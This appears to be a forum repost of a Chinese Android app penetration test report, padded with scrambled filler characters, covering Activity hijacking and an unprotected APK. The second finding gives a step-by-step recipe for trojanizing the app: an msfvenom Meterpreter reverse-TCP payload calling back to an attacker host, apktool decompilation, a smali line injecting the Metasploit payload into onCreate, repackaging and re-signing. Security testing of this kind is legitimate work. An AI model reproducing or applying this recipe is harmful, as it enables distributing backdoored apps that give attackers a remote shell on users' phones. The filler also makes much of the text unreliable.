原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

admin · 发表于 2022-6-8 20:32:44

* n, G% I. m& g( Y- J5 T 7 C* |8 t% a# O* T$ R5 g
0 r" ]9 Z E% z+ K8 s0 t( h 0 p1 A3 U1 }) K+ C8 l1 G$ z

7 b1 f$ B( [+ w ; y& C, ^0 z5 |, u, } 文档编号： : R$ Z7 f+ o% U) q, v6 R 7 ^0 _4 M3 [+ T, t& Q

/ T+ ^: o. s4 l; A* ^# u( f0 q6 ~ 1 D( i1 @5 _) ?$ _/ { - z- o5 k' B8 C 2 f4 b! y" N/ X% G/ ]! s

0 `$ a/ a0 `1 [( Q; n' d; X * R% ]5 _$ [# ~7 D4 k; h 5 l, i+ ^3 U% L1 S" W# l ( P- N, v6 Q# S8 S6 W# ]

" a! s8 w( B0 T0 \" v8 u . I0 n% M7 F' U % U: J: Q+ k" V! o* @ 9 v( c. Y! Y$ v& z

% f4 }) P% }: Y3 T- w/ i9 e6 l- x2 i _; A4 n4 @3 J% N ) F; i* _6 b3 C1 g; a1 a , b- }4 M) v) E2 h; Q- I

, S. i8 [3 x$ v; w) {# d % f3 q! S0 u$ _8 }3 n7 | # i! C. R( E% G: d( L3 H& }' I 6 @2 _# D/ ^5 p, X$ ]

D: [7 O1 U. K# E5 h 7 J" W$ C8 {) ]& D( S 某某某APP渗透测试 & D4 l; B, S7 |6 n+ }5 K: i; G& K $ l6 {$ u, ~6 u; y1 t

$ w7 d+ U- _6 d- N: y8 T0 O, M 5 r% ~8 ^& y6 @ " d! ] A" g+ h2 Z3 r$ }! ]% C1 ~8 ] 9 R% ~9 G. c, E+ G; r

0 u/ C8 A& ^ n# i o5 y7 B" M7 r1 r 0 Y1 C& b- V( D- ]" A ' p, R# U" w4 m$ t( ~ h9 M 5 M8 h; o, o& K- h2 u% S

* \$ k5 _3 p' g' W0 M ( j/ L+ q* u- H$ \ 2 ~9 s! ^& T# J/ O% ? v/ @& E- h% M4 e* Q: V! h L

% y. J' M0 I% h+ l- Q4 `! G9 ?9 V! E % E' }! T- N `! A 5 D0 q. h; w( e8 M9 z0 \ 6 p' P8 [ ^$ K( N: J! j4 B- S

2 y3 q( A: Y+ i: X) }1 ` ' G T) K7 |. u 技术报告 : j1 j9 }7 u0 R9 ]$ @. _+ B& c+ N$ e; ~

. d4 r( b. u+ `$ c " |) K6 E5 ?4 |) c1 C 2 ^, J0 m4 m& g) q; {' M% A6 M8 y% z0 y- l# H R1 p

9 x5 X, U/ Q: W8 ?: I& x& G% i' W% ~7 ~ 3 \/ M& Z, W; T. P2 p , @. T+ A7 H/ d3 ?- J, ]8 t" e

s: d- p0 y: q9 F- o9 o5 g - u- k9 }6 G; I& h$ g( f 6 l; u8 g/ I/ h2 ~ ; C" _* K# O$ F8 e( m% g1 U, z

" ?& |( s3 w2 y) v: Q8 d' K" x9 r4 c# \ + \+ Z' {+ H% @7 E; {: P2 k, H/ t4 m* Q. H

4 Z7 g6 r; j6 f9 D# T6 R- C& n: `$ i* d. r/ w1 }' y: m5 S' { ' B* h2 P9 {+ m6 ~! [ ! j2 k5 ^8 v3 b4 a0 U* N

q! r, |, j* v3 n, b( E; u- [" ]; E% v) A' Z; q2 j& q6 I & X. e% w7 _0 Z1 s- s2 Y' x; ^- @ 5 W4 @- _' \" m" e8 |

7 J0 H/ b- i8 v. I7 ?7 b & I9 G# M& L0 ^; s% n; o f) ]# `: ^* \3 ^, g% ] 0 e/ g& g- T) b; X/ [# V8 T% C/ d

& h" b) p1 F( w. Z9 _; }6 m; G: K: j/ M5 v, p/ O" ]+ ^ 7 M; \! |7 q X3 `+ H / S) f1 g/ u: F) _( W1 G; Z4 _' n

& b8 T1 e: K8 ]) X' S: f. Q 3 H% ] E4 m2 [; r( Z 3 |0 O( a/ X- ~+ A 1 @: O) U5 ^/ U1 x

0 W: D% N! a g0 }+ X8 I0 C3 V ; A3 ?) }8 m. k/ _ ( g0 i9 t9 s$ F" F" n+ r U7 v # o1 G$ |& n# ]3 I6 O& f9 F

3 A+ N0 p. ]: U# h A3 @. W1 ?! j; ~ ) }( A @5 U9 F " c$ S2 h+ \3 u( n: {7 @3 {- @& M! e- j

- d" U( G3 [7 N$ S: d / V! w' J( O) h ' Z* z/ [* ^+ c) f # q2 g7 q& [& p$ L+ O0 G

, A! c# G5 n0 h* a) p+ _ ; d6 d3 o. j' H" T. b : h8 t( f% y7 J$ q. k0 ?( @9 C ( v2 r. Y+ J8 Y8 U# \9 _+ W

0 G9 w [- R& O" J6 }9 K( r; x) ]/ u; S1 o. F) } & Q" w- R# c2 a % L) v) L3 [, k

6 O a5 a/ C$ y9 Q5 V : k' ^3 ]. ?' i) [# l- p( f. C1 ? , ~6 V! X( E' d$ h: ~0 p- {& }) M$ e+ G' V7 h5 }0 k

0 P1 h3 f L2 C# u2 O! u6 M4 Z z. R- s / ~. K j' ^0 _: N2 y" f2 T8 a" |1 j: D1 |9 ~6 u/ z! x

& y# F) ^- _% u% W" `/ w" A+ _$ r1 K& z1 C6 B0 b ' T( n7 n; \3 {" G. K8 a 8 W0 Q- p0 ^7 c' I& m

- l9 a1 [9 l; S% ` 7 O0 f) {1 a; w$ ^ * n/ d+ [; a& X% L 2 N4 T9 ]7 i0 \! s0 y* Q+ \5 X" ~

- b0 j! Q. i" j$ p7 i9 W) `, u' ~+ z& J4 G' U 二〇二〇年 / Y R9 x) N1 M: I. l0 ^6 H " l# d) b1 h ?1 K2 H) \! }8 Y

. L, J+ N) T8 R# U) i2 V! b9 c$ y; |& c 目录 7 [" j5 i G! D , z& J/ L3 {; V

& L! P3 K. W2 R, v( _3 D `( r5 N9 O* g" \ $ i& m# t* {2 S1 `! k / P4 a& e' Y' _8 K1 h! s4 T

+ ~/ u. W: ^/ c; _9 q" D& H, _! B6 o# m% \: @ 1 概述... 3 5 c7 x/ M1 p& D* q7 o, b8 B- G ! [$ R: r. j9 T2 T

( p; h+ H$ B- N' b% D ! R5 r/ \7 T4 p' ^3 K# r5 A o 1.2测试时间... 3 / b5 }' a; X' t' M * V$ u( P9 U- Z8 O" e5 V; [4 U( e

/ N& y. r/ M- @0 S/ A . S9 o3 d }* C$ @ 1.3测试对象... 3 / c1 Q5 [5 U6 _4 Q$ m % d8 K- H0 V1 f0 w

9 G2 V7 H! h2 H9 j# y. I9 T " q; Q- N$ o8 f0 X& M" ?" o 1.4测试结果... 3 1 r! _5 E. N* I) r' a- E * o2 w9 U# }2 t" g; I! v

B" T/ T6 g( U# J) W6 l, J- v 7 x: Z" M! i" P& l4 {9 L 2 检测结果... 4 3 X5 l' Q4 K6 F9 I% b/ f5 q& i3 Y0 J& m. K* z c2 I

& @- H5 @3 n K& q) n: ~- d& M9 [, V8 I, l 2.1 某某某... 4 8 ^. o- y. c' c+ _7 C) j- H 4 P2 Z1 W1 z2 u/ n# r5 R" g

G/ y' S( e; m) I- T: |; Y ) T: V q4 h3 d+ {3 l4 j6 n8 o 2.1.1检测目标... 4 8 o! N5 M9 x3 N, y. b6 f + Q2 N- m5 ?9 d3 Z9 v( m. |

6 S. Q4 x& t/ R, R2 D2 w1 [ 9 p# N9 {8 r/ {5 L 2.1.2检测结果... 4 6 g8 ]' a" A) k5 S, `1 G " \3 `/ Q. P7 y. Q7 L' W

% l! M, X4 N$ a2 q" X* N 3 K; ?: W/ N s# N6 q 2.1.2.1. 4 - f$ g0 ?; h: p c 4 b" f1 O8 D) n) N0 G7 a( `: K

7 V4 ?* P1 z- M* J% r + Q, b- n" K* \: n) A# q 2.1.2.2. 6 ! E/ x9 V' X8 |0 j- }3 O : R) g: @ g7 S9 B3 v! O' ^' y

' y) U% J, S$ Q2 e % Q/ s) m- y' L! y, ` ; a9 ^' x- T7 W b * z7 G5 B; N4 f0 e) w5 Y" D0 m

+ s: t7 b; g3 f7 U% D- l- `, ~5 H" k( A0 J3 B, U 1 概述 2 V. Y- o9 j# Z6 i( g 2 I( Q/ B' y. R) {% ?* R

$ o: } O% P; u1 i8 X; X 3 q4 O4 |" \2 _ I! z 1.2测试时间 ! p( _5 l- |1 T M2 ^ 9 _ d2 ~+ z# R7 i4 h+ B* {/ c

8 X8 t' e/ h* h$ l0 E: ~9 [- C 9 A, U% M% s$ B; L2 b% h! ] / }/ Z; ^! ^$ `5 R " j8 c2 [ o3 p+ S% V1 _ 渗透测试时间 9 B- {1 L$ J3 k# f8 }* x3 v# j " j, P) q7 Z$ z : P& \|9 K1 O4 u$ T; S 3 l4 P: r( u3 I i. m" F5 p
5 L# l# y( N: R6 h5 b ^6 Z# l. u$ ?2 t ) z! f' t. L. e" l9 k; U9 E4 `. O# `6 u( _- h$ f. ` V 起始时间 5 a; E- y, j! A2 D8 s3 q* O5 Q& q ' P/ N( I+ `: y4 `( e y O6 c ( Q# y# U" ?' T/ V% K4 V' l1 R( d$ f7 U# E- Y' Y- W	. S# h {. \|) Q o# ?5 @" B7 U a; W7 \|! P$ K6 B ! C0 @7 w0 [3 k* ?; V$ g0 A& L/ q1 M9 c g }; A0 e 2020年4月6日 % d k, K' w2 R! A% f$ T0 A / W7 Q' q4 L Q( P# w , \- i9 c" u5 b 2 t0 }1 W8 S5 S% u& {
8 a: s2 e* [; a" t4 [) t3 p/ N % X O4 ]$ X/ y2 S3 [+ O 6 g8 S! h+ C6 j. o- X P ( o, Z) f) ]9 ]& ~8 U6 ]' z 结束时间 6 _$ w+ B. n; A2 k 4 A5 ?0 P2 L* d3 n9 ?. Q ! ~8 z9 }* U2 ^+ [. d7 o: Z( I9 ~. x2 J	7 s) ?) d. e; u" d8 B; d% p9 w0 L' \. @; G* e8 L$ ?% A, B 5 P' u# a( p, r; g3 c5 ]) Y 4 [. t) j9 n, {" N. u$ z) v( R 2020年4月9日 % I' \|. n9 b* k0 Q! B) {; z# ^ ) S4 B$ \, B8 H, a9 f) o0 w * f' ] H0 x3 L% ^2 h0 s1 [5 O- p F$ A; Z: K- ~: @4 H$ Q) ]

6 ^3 B* a) u: k% t8 E7 D; d( R3 Q8 l! j0 q; c# N 1.3测试对象 - v. o$ [& Y7 ^$ @1 a3 Z1 I2 A% P

; C* A J& Y4 o8 O2 _ " }9 f0 h5 Z/ p" \2 v# N4 A1 U1 @ 此次测试目标为某某某安卓APP进行渗透性测试，APP存在安全漏洞数量如下表所示： 8 X. Z8 B$ ], `+ k 4 F& v) z" i! x& i. s; s8 K7 V. k

2 O1 `: Z- @& S3 W, [8 p 8 f/ c: e q- u 表1-1 检测对象 % w! Q5 J' Q2 D% a 1 }4 y4 h2 }: {- s

) L' [# p, P5 R3 a. E9 X - @/ _# F) L, C' ?: p # j. s# X# v6 A8 ` 9 l0 z, i% c* @3 H( Q7 n4 k- V0 A 序号 $ @3 e* c; \: U. H" x ; E( k. i9 _/ E , y# F& z3 l( y6 {. I* e ( I( P2 m3 s* \|8 \|/ Q2 O' t5 G5 Q	% {9 e& H- L* q' P6 K$ \/ g# [. Y) I5 w6 s # w& V2 c; r6 ~: @. ~ 4 e2 i+ O/ S9 ~' G 测试对象 ; C& v$ ]$ x& [0 F1 ` + Q5 ]# [% P1 s: W 5 p( m1 ^/ X% t8 d ! d' X2 ~' g' `4 {	+ _4 D, e; h# z$ H4 ~& N9 a : P% e* n K2 l( e* C5 @: p" t 5 @# Y6 \|' ~ Y i3 n( ^" O' K4 j0 D' m2 n% {' V2 W2 ? 测试地址 / E i* y7 H9 w) k4 h# k: ~- [! C" N) ?2 B5 U! } ! Q4 ~% X% G7 ^. j5 _3 k( c* ?9 b( y( C	# G0 m: G9 L" y ) [( Z# P; u# N r/ l+ P) C) k) q 0 ~; s- a3 N9 ~! P4 D# G3 l ' o( r P% Q- N2 D0 }" M 安全漏洞 : n! j2 t, O9 T: T% P# W ! @2 x$ z1 J4 A/ K) I 9 a* o! k$ D6 N# Q $ p! P/ N/ e4 ~! x. J
& _' h% y" D. \|6 `, h ( [2 _% ~+ a" S1 U L* ~ ! Y8 g' d" R* X/ F/ x* b4 t$ k3 `2 h2 O' c3 L ]6 ?( e; e4 ? 1 " M9 c/ W j }) v. T # `9 I# M6 G& D' \|! u+ U* [* } # v* P, n @8 k8 m) T 7 W- n9 \|' i; m N0 ]7 \|: S/ f$ u6 ]	* w6 D+ I# G: `) b9 ?- z1 }0 h. g& S8 U # C7 Q) F x, D# `: w6 w$ X8 S- U4 @$ W7 L3 ?& [+ L* B 某某某安卓APP - R$ a S7 y/ z& b0 Q2 ]' ^4 N; G$ C7 H/ x0 g/ I6 x 1 D* A) G2 U/ p5 y! i, B: Z 5 a" ^9 f' G% ?" q$ E' m0 b4 \/ H t* d	8 {; p9 W0 h5 ~; G6 I7 h 0 v- d6 e; \|! ]0 c$ \|3 j . i+ P; @2 k( O0 f6 b6 j9 z8 R, h* ]( x4 ? 1 ]! r% E t* \|" n5 Y5 q * f- p1 `2 ]! G3 V h3 d: W 4 h; E+ ]: x3 q* O+ \|# U1 ?% z) e) a0 t0 f! y' L3 y	8 K* L6 C* v, g2 t8 W- g, L% s6 F / f% Z4 m- i e 4 H) I* P' L3 i2 ~" ~2 t 7 X- w8 h$ `: }( }0 D, d 2 6 B h" Q- o+ R6 _5 J4 P. r 8 j" I4 \|1 R3 E5 t- t a' P# ?$ c6 X8 o8 _) p f( D" ?8 I& s% E5 Z

2 D1 }) d8 }7 b: o& t, b9 {" I! i) I) y( j- a 1.4测试结果 0 O0 W. T' o& {- ~ / S6 x( @( h, N6 b9 B/ i

1 V' d0 Z( G4 `9 c/ l / F! g) k& A5 c6 q& m: u 在本次对某某某APP透测试中发现，APP安全防护存在一定问题，主要问题如下所示： , `% o. u. n& k, g' N4 _ 7 U/ d8 {4 r7 t9 u- r! M

7 b, `+ O$ Q1 S& u* t+ X$ s . r, E p. O# P* G) u 7 u$ w; r/ y! v2 u" u9 P 8 b- c, b9 I0 k5 Y% j0 }8 l

. Z5 `) q; x4 _3 M. | $ m/ F7 a7 [4 s. [ 序号 " z( V% P, j( P3 Q2 a: k$ t# C1 S [# j6 o- q$ F$ y; W

6 w8 W6 ~$ \' m) \9 u: ]3 a4 x) p! Z 0 [5 ~: r/ L0 X- { 系统名称 ) O# }2 v; W2 `* J( J8 p7 L* R 1 Q; A, F5 O$ z! Z( m/ M" t

, O/ f( t) d7 c/ v4 ? & b; C1 `0 X* N/ M 漏洞名称 ! ]( G7 O" r, p( b+ }: X1 R 5 U! |: z+ Z9 L' I* w

' N. F! n+ q0 B3 h3 {( y9 ~ , L( G7 G7 C' S+ {8 K 漏洞危害 % H) X, T! c# f9 K0 L g 0 G; S1 ^' L9 }/ V8 c$ `$ m! t. y

9 c! G; x; A2 R" f. n/ N- H0 H& h& B( O/ |8 H 修复结果 8 u" V8 X5 U- A , I9 M7 [3 M; [" i

, A/ g' a; D1 b8 d) o1 n$ Z ' t/ M& N# y" }% I4 F6 D 1 . _6 y) M+ G* t8 J; A5 _; [% c' q* h

6 J8 k+ Y$ z$ @% ` $ a/ I$ |& X2 L+ I 某某某某某某APP 8 O; f [0 u: P- v9 z; {( x 8 j8 B/ O/ _( [0 I8 a

& o: m4 Z% P H& B: h. ^, T: V5 J# p, u" @, N Activity 劫持 : l) h$ F4 H; y. ] # `6 L1 r+ C% c" M4 E w9 q

# q D' b2 H& B & |( g. J2 ]" D5 l# K 4 Z) Y0 g' u T7 G( B: g* v- Q" m 7 W: f; n$ ^6 M% O: s; X, | r9 f" ]

9 g. q7 y6 Y3 N. u6 z; G2 R @5 y9 D) x% H3 ^% b2 K& [! J 高 3 ]! W1 W% \1 u- S / t8 J: s, i1 H0 R6 ^

" F) {" _, s% F+ G. c / ^! |/ s0 {( t& U/ I * C2 L: A3 @% E7 P3 A c8 D 2 w* q8 P5 N) u; c: |

: Q* B) c8 Z0 T' a0 o& ?+ O- O+ g% p9 r/ B& W 2 / i" A3 _1 h" q- C - E$ m4 _' U" q0 W* D, f$ {

& i: ?5 _2 x6 R4 H . a# M; H/ d3 _7 R8 w 某某某某某某APP 9 u/ `8 m6 }. g3 |: n 6 i9 R+ L' n% S% Y

) I/ v7 ~) f& R3 U6 E' {- J4 j . W& j1 c9 e, J) a1 h' a 反编译二次打包捆绑木马、篡改APP代码 2 h$ x" X" m9 R* U7 X2 w7 Z' T + w( V8 N9 N3 j2 q; i

6 ]0 G! ?; b8 d' c8 T * ~' D3 q* d' g0 N. z6 a 高 8 @ {' g4 }7 q. q ! _' g& h0 b4 J* v3 U2 m5 Z$ }* S

: P1 L! M- T& w5 ]: Q( Y 6 H7 ^+ X9 [, |" d% o - |( u! O$ w! [/ y, j. E8 z7 s % c6 L* C! a/ E# D3 P; a5 N, v

. W+ [$ w- c' o) O" l( H0 g: |4 K, T$ r4 G* z% x' l 6 Y6 J) u. W3 g& M1 p: \# w# R( r" n9 r4 Y" A/ f3 w

1 d; Q7 M5 [2 `$ h1 n / w( u( I" f) X2 o h0 X0 B: j 表1-2 测试结果 ; K2 G5 @# w* Z2 {/ b * r3 E# g4 ^. R; k$ F: }# G# ?) m

# A+ N- o8 T3 P0 o6 ]7 ] 6 ]5 c) b' k! ?/ n* Y+ y. P 1 ^1 a% B7 C+ t8 c5 a W' u 7 r0 ]4 ]: @2 j# k: G j1 d6 X" a( i

* R" U' g8 E0 G/ F" k8 ^" s' T ; b W; K/ m9 T* V2 b 2 检测结果 # R, {5 I @/ C6 _! \2 G( I' a . B, q' c! z' [# Z8 O% U

" [4 i0 R. E) a/ A- ~! @+ f/ y7 o2 I! I; t" A- ` 2.1 某某某 1 X9 l/ N5 f0 A& T. J6 x$ I& T K# e: [8 n) A1 k' u$ F

7 ?1 _: }* h( n, t , f4 t% H6 `+ s) h- ]6 W 2.1.1检测目标 6 k$ e: a' `) { 6 v2 m" D% n) A, M

5 s; A' }/ }( L `$ T0 r # c9 W0 c/ T% u/ E1 _2 O 目标地址： 某某某某某某APP 8 b$ y1 b, Q/ T5 u 6 C- T; _7 _; S9 H) g

4 q4 R+ S. K3 i) X+ u3 k" a9 \2 q( Q! n" X B$ `. W 2.1.2检测结果 " }3 I: e7 S4 Q: m- c + y4 B1 H$ n* @% [ N" j- ~

+ Q8 ^/ L/ F2 M+ r% n" c3 k( J! \! u3 i) m, d6 ` 2.1.2.1 1 W) n) Y# x( C; E6 A* U8 J# Z 3 D' d6 \- u2 ?7 J( x

- b3 k7 D. B9 k3 F$ ^ " }# T+ F: p) |4 R8 ?) X# c 漏洞链接地址：某某某某某某APP ( {. o! m0 o, H. [1 F" I1 g, V( v

* j3 i. `; a. ~, u$ t ; e0 W. ?, J% y# v1 O t ( {: ? Q6 C R; D V 3 ?7 H; V& T+ |+ X5 I4 O o; H, H

, c: `, I4 G8 |5 c; ]* _, V) m: y, \* e+ N- {* U& n 漏洞分析及取证： # m$ B' @* B# j+ g/ B6 U+ X5 F/ }; T

! a+ y3 X/ m9 K1 l* B! P 0 f" v8 k, s6 H( p. K( v 通过androidkiiler反编译，发现app未进行安全加固， Activity 为com.minivision.cmcc.activity.SubActivity可被劫持，复现漏洞如图： - O4 B9 s2 _: T0 M' F. g& }5 r* e4 F% x$ Q* S

2 h K5 }8 ^; @6 Z( {# ? : w( D( @, \" {& f; X& u6 ?+ Q ! B. {9 _9 D4 n; \5 v $ S: r g& ^9 d9 s3 N( x

, }; d6 k3 b; `/ P. G, T% o; Q 7 I7 h$ j8 I0 q, Q) U% N, t' H $ @. t0 ~! }; K& @9 m; Y7 i- C' G9 q0 o1 \$ d, H1 G2 A

) F1 ^' c/ X0 v2 k4 } 6 D8 r2 W& E% b( k. `! L# u % m9 Z: k8 C- Q; l+ K ) x A. ]3 D; s6 S* Z3 ]: P

1 {2 t& O0 [6 t7 |$ e3 d1 [/ {/ ]! j3 B4 ]# B( t 6 c* t4 e( W* h4 }" C" h + M% i$ m; [6 }% M& E; }1 M9 ]

. E- l. Y: i' G, x9 J& ?& L0 B& ^$ k8 Y: t; H" h2 l& S 4 s) E. ~/ m0 A7 o9 K3 E" x* X, D3 @: i, k; A/ k

) x; J: [" e3 M& j9 H* m : v8 t7 L1 j. m3 O4 } 漏洞危害：高 & Z7 h$ X. h# d" V# ?# ^2 P* ~" u4 l& B" U: h

$ m( Q6 S, u* S2 J7 U- M% D $ }4 X @) S% f- \|& {# ~! ~' H # i0 x- \ F* O1 R1 s & B9 I8 f) X8 ]8 a, X3 G9 A 严重程度 7 o y& [' N* K* k! r5 \2 A8 W8 W% w0 z- _; _, F8 T1 G : W8 R, E2 \|6 c L# c0 F: Y9 V 5 _. I, ?! j/ {' n3 l	3 x, r5 S& H; x4 K 0 J8 f- ?$ _; b ( _% N4 q) w. C 4 A, n( \5 ?1 f! r2 O, l2 E2 Z% @ 高 : O+ m- J- E! a! q$ L 7 f" V" H$ B" p ( E* K& a Z0 D1 w( [8 q/ }. i6 o5 \|	+ D- N* P! S0 m. M% Z! Q" h$ ^4 w! K( o % `6 O# d9 H" w I; f* n. F3 l+ S" D" X# c( } ■ 6 I* f- ~ }; \|0 L I % R) n. {6 b: \+ E 5 H7 t" S; N! P* K9 k2 \| 8 P, V1 m5 i# n: q. e	* R" C& t6 U0 O& _, J/ w" G " }3 @, N, \|; c e$ M- ~3 o5 Q( K: {; N 1 o1 Q$ e( B; F 中 : X5 P9 F1 e6 {' q0 R 7 _- R3 s4 c. w) ]- N; D . D( s3 K7 d7 \+ D; @ 4 e. l: K) n! x7 j1 \|# y. o7 ~	+ P3 x- K8 z+ j , W2 Z( \/ ?3 K% _, j X ; r5 f/ u$ y; [+ t. x& _ * r) i D7 K$ D( p8 f, f, _( s 8 e5 z5 _% r) E% I. `7 o+ d4 J9 u 4 N) i5 C" u. H3 b2 W: q7 z& o3 s/ V# r ) f; k3 B H2 B- z ' S* F; r, K# _	& A: _- b% B9 @( L/ W " i- z1 O* {! n/ t - W5 j: R; ?; P9 o) m: K, r$ U; _: Q6 \. M1 Z9 ^" P! f4 ^; ~4 u$ I/ G 低 % }1 L7 z% N6 f, L: ]$ U- A. } # ?# y' N* Y5 i$ K7 p & l7 u) X- m6 P2 f: p- P3 F8 D; G" s, ? ?& t) i( v5 d' c	, I( S( Y) @3 [. U6 p " N& ^% q0 {6 {0 s2 {! ` 1 }- A5 [; P/ f9 b ) Z/ I( q5 G6 X) n q- q 2 D9 s! c* Z% H9 ?' B C7 ?# } # A1 L/ W% L" X1 [ * }- B* N5 P; [* [/ \ : _/ b( t6 ]2 d! f) }2 w

: K9 |0 D' v/ ]' v" i8 a ! b/ U: q% @! d4 h' n * Z/ T" }. M- L4 u3 w0 H" N - P9 V/ U1 Q# `2 T3 D$ I; i

6 m7 i9 y4 U! e6 M+ @/ P3 @" K3 |% z2 y4 R) k6 g% ` y 修复方法：在 APP 的 Activity 界面（也就是 MainActivity）中重写 onKeyDown 方法和 onPause 方法，当其被覆盖时，就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的（触摸返回键或 HOME 键），如果是用户自己触发的则无需弹出警示，否则弹出警示信息。 1 X' W7 Q$ x0 `& r r0 w, d( c% u# h/ C9 R s8 J& f- O

. ~* r. Z8 [, V) D9 K# k3 q, s0 ^4 `, a" V4 e, ^ 8 I7 d6 X( O0 z5 K+ w1 k! E Y ! W0 M& f( v! G/ F

7 o0 @7 T) W& N* C% ^4 m: K. ?: w8 g r : ?( ?: ~- u9 S' @) u8 t1 d # P0 C- [" T1 }

! g7 D: t( P" B! F! b3 V ; [8 W$ w0 ]6 u/ i: \ 2.1.2.2 % P9 }$ F% S6 `- K4 I% B% M 4 j- ?/ r% n( s

, z) t! T0 g3 h0 g$ K4 U8 [ + r6 }+ M' f# X5 S 漏洞链接地址：某某某某某某APP 1 o# B% E) H6 q+ ] 5 P7 f( N/ \) b2 u2 ? m

( w. A8 r2 a; d3 j! j* H % h r4 R; p' I9 d 漏洞分析及取证： . z8 T7 E$ S/ ]; t8 d ' ~" x0 y) z1 K% c! E# f- i9 i$ b

% i R+ t+ p X/ W& j# ^7 g . S7 m, n+ c7 S 通过反编译，发现程序未加壳加密，可直接反编译获取源码，经过测试可修改app代码捆绑木马或者植入广告等操作，复现详细方法如下： : s1 I/ q7 i' x2 A& p 2 S% u4 T: w6 X+ z, K

9 _' L/ X) ~) ^, H1 \/ K" t L$ j8 o& y. `5 \1 R" _ h 用Metasploit 生成木马 apk ; S( Z9 j7 V0 ?* [ F8 i # H2 F; q/ s+ M' V

4 V5 Z) ]/ e1 \/ R8 i, M$ s1 b ]: u msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 7 I. C8 J; ~( x1 Q7 P ' I! ^/ d: O' o b: c1 ~5 X

$ g! `* V1 b2 _- g$ D$ B ]; I/ A3 ?2 A& k4 O 反编译目标apk和木马apk ' m5 J& O" Y3 q4 V: y / D/ p9 ^4 z8 m

3 y9 r8 A" K _/ ? J0 l5 z9 m3 J6 ?3 {) Y; Q apktool d target.apk
4 q$ @# v, F9 \2 r7 o; f* i+ _7 ^& V/ U4 Z& Z& R! C# J apktool d cockhorse.apk + D7 h X3 o7 S3 c9 } * Z6 q) L1 Y1 O0 _

4 W* x! j& Y9 D$ k! a + l# ?" g. w1 U! e5 k2 R- L( w 木马 apk 注入目标 apk " j6 r Q" A! `3 z: E 2 P2 a9 W5 H8 \1 `# A& f1 j

+ ~/ m0 G( S5 ]7 W2 m# B: A$ P/ |* Y5 d! y/ W6 @ 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件，并在 onCreate()方法中添加如下代码：
& b6 N6 @* ^; W# K+ \6 X+ [* q: Q9 w7 d( Z invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V % x" d" L, Z# C0 U Z4 L; _, r ( I1 e5 v' r$ P( G1 K

9 G* A. n- o+ T. J & D9 m8 Q9 ]' \$ i 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中，去除重复 5 s! _+ B* x: \# X0 ` 5 N3 D t& ^) s" ~( `

% D p" E' B' p2 `& H" I, k C # D" X0 |( D, y) K6 i 将木马文件的 smali 文件放到目标文件下，例如 com/metasploit 文件复制到目标文件 com/ 下 1 x I6 K; [3 l& _ 1 n; u5 N- |) ]+ B9 z

+ l. m- v- P3 a$ b( ]4 G " F! M% ^/ j, {1 ^" E 回编译生成最终 apk 5 ~, Y8 S3 l% D- U7 m 3 c) S- E2 u& R- n% [; g# F

7 S- v2 X% J9 m) w4 m' Y# b7 m! u, h; ~( u& G; s 重新打包 6 g8 e" K8 u" K0 d . W. V" T" N1 v* I

7 ~5 T1 n2 r3 X+ ~ : F6 Y, w, C u) m# u apktool b -o repackage.apk target_app_floder ( w6 W2 J' F8 l) [ ) ^. E7 k+ H. N M$ s9 u

( Q$ _- M& ^7 B) v; B0 g1 @/ p* @2 f' D 创建签名文件，有的话可忽略此步骤 ) @; _8 Q& {+ @ 9 A9 L# { X4 P+ s& q' m1 ]% z

, r3 R. `+ K; b0 F+ p% r# o7 w0 { $ Y( n9 S& q% S2 f keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 : i- _7 p! _/ M3 V w s6 z" U. M! A# J. P/ v

9 P% k: j/ A0 |" `, ~' _ * y9 ^6 B J5 t, h0 J+ g 签名，以下任选其一 1 ]) H# }: o6 k4 \( I' D P8 k- A) V+ n6 |2 d# ~

* u2 J* _# T, j$ W9 j " L* p" f& A2 J. V! R jarsigner 方式 ) Z1 z0 W+ J0 A% ^. _ 3 [9 ?- v) \/ a) H

5 r8 K' d% a9 z0 n, I2 c / C8 [! s/ Y5 _6 ] jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 2 [# A- u# `: `, d* b* t 1 K |# \2 G0 T

) [1 F% @$ ~0 y. z5 y U 9 W" B, s7 }+ J" z0 J z apksigner 方式 5 h$ @( ?" `2 E7 @: E- Q1 ]7 L ( A0 r7 }5 d6 x7 L1 S' J$ X

' ^, q; F7 O0 o2 q, n' W* ]% o% T [ . j- {+ ~6 z6 \) G7 U apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 3 T5 {2 h" R* o5 Q: H/ H2 C & ]$ T& s9 L- C( q2 u2 S% ?

- ^( i5 u1 s- D$ ]) ` ) l( R3 p- v5 A, B0 S 如需要禁用 v2签名 添加选项--v2-signing-enabled false " \8 e8 ]" [) {7 C( X! `) z, U # L+ n% l" r" r

6 G! k; A% u; g. S: f " n/ j4 h' k+ t" K) {1 [ 验证，以下任选其一 8 ~! h y3 r* t5 ]* `! R4 o - _, D- w' J b( ?0 P- V. Q

; h$ ^3 C0 C$ W' S* ^ ; W0 X5 d7 X: _% X. A( o jarsigner方式 / R- S) a8 ^6 u X% g* M4 C; V; K3 t/ P8 m4 W0 _1 K

) o4 V3 f0 J% A: A ) C( F3 h9 e5 o0 V) @7 v- K jarsigner -verify repackaged.apk 0 U& n1 a4 j' m+ X6 A & I: d+ e& ?! L

8 B6 |" F9 y& J: h4 E4 C' r " ^' H( d, d( e0 v( L apksigner 方式 $ g9 W' B( |; D/ X$ l( j " P' }7 Q) ~2 C4 c4 G5 U. X/ L$ i6 r

0 S) [" i% q. o. q7 s 8 M9 y; R6 D1 v: e, d apksigner verify -v --print-certs repackaged.apk " e8 F4 N9 w: t+ U4 h 2 v: Q, {3 { R4 f2 F! P

: z6 q! `4 ?" H1 k7 q8 |$ S& z" X$ j: ^1 R" _" J keytool方式 5 {" ?7 z* g' |' V: U N% U! I2 q2 B: C( h1 n o# P

